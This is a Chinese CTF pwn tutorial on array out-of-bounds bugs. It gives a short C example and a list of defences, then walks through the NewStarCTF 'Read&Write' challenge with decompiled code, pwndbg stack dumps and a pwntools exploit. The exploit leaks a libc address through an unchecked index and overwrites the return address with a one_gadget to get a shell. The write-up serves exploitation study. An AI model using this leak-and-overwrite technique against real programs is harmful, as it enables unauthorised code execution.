ctf-pwn: 数组越界

1. 基本概念

数组越界（Array Out-of-Bounds）通常发生在以下两种情况下：

访问数组下标小于0的位置。
访问数组下标大于等于数组长度的位置。

2. 示例代码

假设有一个C语言程序：

c 复制代码

#include <stdio.h>

void vulnerable_function() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;

    for (i = 0; i <= 5; i++) {  // 注意这里的条件是 i <= 5
        printf("%d\n", array[i]);
    }
}

int main() {
    vulnerable_function();
    return 0;
}

在这个示例中，array数组的长度是5，合法的访问下标应该是0到4。然而，for循环的条件是 i <= 5，这意味着当 i 等于5时，array[i] 将访问到数组边界之外的内存位置。这就是一个典型的数组越界漏洞。

4. 防御措施

边界检查：确保在访问数组元素时进行严格的边界检查。
使用安全函数 ：一些编程语言和库提供了安全函数，帮助防止数组越界。例如，C++的std==vector==at()方法会进行边界检查。
工具和分析：使用静态和动态分析工具检测程序中的潜在数组越界漏洞。

练习[NewStarCTF 公开赛赛道]Read&Write

查看main

c 复制代码

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int choice; // [rsp+4h] [rbp-41Ch] BYREF
  unsigned int idx; // [rsp+8h] [rbp-418h] BYREF
  unsigned int num_to_write; // [rsp+Ch] [rbp-414h] BYREF
  int nums[256]; // [rsp+10h] [rbp-410h] BYREF
  unsigned __int64 v8; // [rsp+418h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  init();
  menu();
  memset(nums, 0, sizeof(nums));
  while ( 1 )
  {
    printf("> ");
    if ( (int)__isoc99_scanf("%u", &choice) < 0 )
      break;
    if ( choice == 1 )
    {
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("The num: %u\n", (unsigned int)nums[idx]);
    }
    else
    {
      if ( choice != 2 )
        break;
      printf("Idx:");
      if ( (int)__isoc99_scanf("%u", &idx) < 0 )
        break;
      printf("Num:");
      if ( (int)__isoc99_scanf("%u", &num_to_write) < 0 )
        break;
      nums[idx] = num_to_write;
      puts("Done!");
    }
  }
  puts("Byebye!");
  return 0;
}

很明显的数组越界,我们来找一下偏移

python 复制代码

Idx:256

Breakpoint 2, 0x0000555555400a23 in main () at Read&Write.c:38
38	in Read&Write.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────
 RAX  0
 RBX  0x555555400af0 (__libc_csu_init) ◂--- push r15
 RCX  0
 RDX  0
 RDI  0x555555400be2 ◂--- push rsp /* 'The num: %u\n' */
 RSI  0xffffc370
 R8   0xa
 R9   0
 R10  0x7ffff7f70ac0 ◂--- 0x100000000
 R11  0x7ffff7f713c0 ◂--- 0x2000200020002
 R12  0x5555554007a0 (_start) ◂--- xor ebp, ebp
 R13  0x7fffffffc370 ◂--- 1
 R14  0
 R15  0
 RBP  0x7fffffffc280 ◂--- 0
 RSP  0x7fffffffbe60 ◂--- 0x1ffffbef4
 RIP  0x555555400a23 (main+225) ◂--- call 0x555555400750
──────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────
 ► 0x555555400a23 <main+225>    call   printf@plt                  <printf@plt>
        format: 0x555555400be2 ◂--- 'The num: %u\n'
        vararg: 0xffffc370
 
   0x555555400a28 <main+230>    jmp    main+367                    <main+367>
    ↓
   0x555555400ab1 <main+367>    jmp    main+71                     <main+71>
    ↓
   0x555555400989 <main+71>     lea    rdi, [rip + 0x247]     RDI => 0x555555400bd7 ◂--- and byte ptr ds:[rax], al /* '> ' */
   0x555555400990 <main+78>     mov    eax, 0                 EAX => 0
   0x555555400995 <main+83>     call   printf@plt                  <printf@plt>
 
   0x55555540099a <main+88>     lea    rax, [rbp - 0x41c]
   0x5555554009a1 <main+95>     mov    rsi, rax
   0x5555554009a4 <main+98>     lea    rdi, [rip + 0x22f]     RDI => 0x555555400bda ◂--- and eax, 0x64490075 /* '%u' */
   0x5555554009ab <main+105>    mov    eax, 0                 EAX => 0
   0x5555554009b0 <main+110>    call   __isoc99_scanf@plt          <__isoc99_scanf@plt>
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffbe60 ◂--- 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂--- 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓        5 skipped
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► 0   0x555555400a23 main+225
   1   0x7ffff7df9083 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 200
00:0000│ rsp 0x7fffffffbe60 ◂--- 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂--- 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓        127 skipped
82:0410│-010 0x7fffffffc270 ---▸ 0x7fffffffc370 ◂--- 1
83:0418│-008 0x7fffffffc278 ◂--- 0x8c8da80a4deecc00
84:0420│ rbp 0x7fffffffc280 ◂--- 0
85:0428│+008 0x7fffffffc288 ---▸ 0x7ffff7df9083 (__libc_start_main+243) ◂--- mov edi, eax
86:0430│+010 0x7fffffffc290 ---▸ 0x7ffff7ffc620 (_rtld_global_ro) ◂--- 0x50fa300000000
87:0438│+018 0x7fffffffc298 ---▸ 0x7fffffffc378 ---▸ 0x7fffffffc74a ◂--- '/home/a5rz/Desktop/pwn/file/pwn'
88:0440│+020 0x7fffffffc2a0 ◂--- 0x100000000
89:0448│+028 0x7fffffffc2a8 ---▸ 0x555555400942 (main) ◂--- push rbp
8a:0450│+030 0x7fffffffc2b0 ---▸ 0x555555400af0 (__libc_csu_init) ◂--- push r15
8b:0458│+038 0x7fffffffc2b8 ◂--- 0xf489a56c1b84c028
8c:0460│+040 0x7fffffffc2c0 ---▸ 0x5555554007a0 (_start) ◂--- xor ebp, ebp
8d:0468│+048 0x7fffffffc2c8 ---▸ 0x7fffffffc370 ◂--- 1
8e:0470│+050 0x7fffffffc2d0 ◂--- 0
8f:0478│+058 0x7fffffffc2d8 ◂--- 0
90:0480│+060 0x7fffffffc2e0 ◂--- 0xb765a939ea4c028
91:0488│+068 0x7fffffffc2e8 ◂--- 0xb764ad33beac028
92:0490│+070 0x7fffffffc2f0 ◂--- 0
... ↓        2 skipped
95:04a8│+088 0x7fffffffc308 ◂--- 1
96:04b0│+090 0x7fffffffc310 ---▸ 0x7fffffffc378 ---▸ 0x7fffffffc74a ◂--- '/home/a5rz/Desktop/pwn/file/pwn'
97:04b8│+098 0x7fffffffc318 ---▸ 0x7fffffffc388 ---▸ 0x7fffffffc76a ◂--- 'LC_NAME=zh_CN.UTF-8'
98:04c0│+0a0 0x7fffffffc320 ---▸ 0x7ffff7ffe190 ---▸ 0x555555400000 ◂--- jg 0x555555400047

c 复制代码

02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓        127 skipped

128*2->256数组从0开始所以256是第一个参数

接下来看看保护

python 复制代码

[*] '/home/a5rz/Desktop/pwn/file/pwn'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
    Debuginfo:  Yes

尝试ogg

python 复制代码

def out_add(idx):
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx))
    io.recvuntil(b'num:')
    part_1 = int(io.recvuntil(b'\n')[:-1], 10)
    print(hex(part_1))
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.recvuntil(b'num:')
    part_2 = int(io.recvuntil(b'\n')[:-1], 10)
    print(hex(part_2))
    adder = int(str(hex(part_2))[2:] + str(hex(part_1))[2:], 16)
    print(hex(adder))
    return adder


def write_add(idx, adder):
    adder = p64(adder)
    low = int.from_bytes(adder[:4], byteorder='little')
    high = int.from_bytes(adder[4:], byteorder='little')
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx))
    io.sendlineafter(b'Num:', str(low))
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.sendlineafter(b'Num:', str(high))


adder = out_add(262)
libc_base = adder - (libc.sym['__libc_start_main'] + 243)
print(f'---------->{hex(libc_base)}')
ogg = [0xe3afe, 0xe3b01, 0xe3b04]
go_addr = libc_base + ogg[1]
write_add(262, go_addr)

io.sendlineafter(b'> ', b'0')

get shell!!!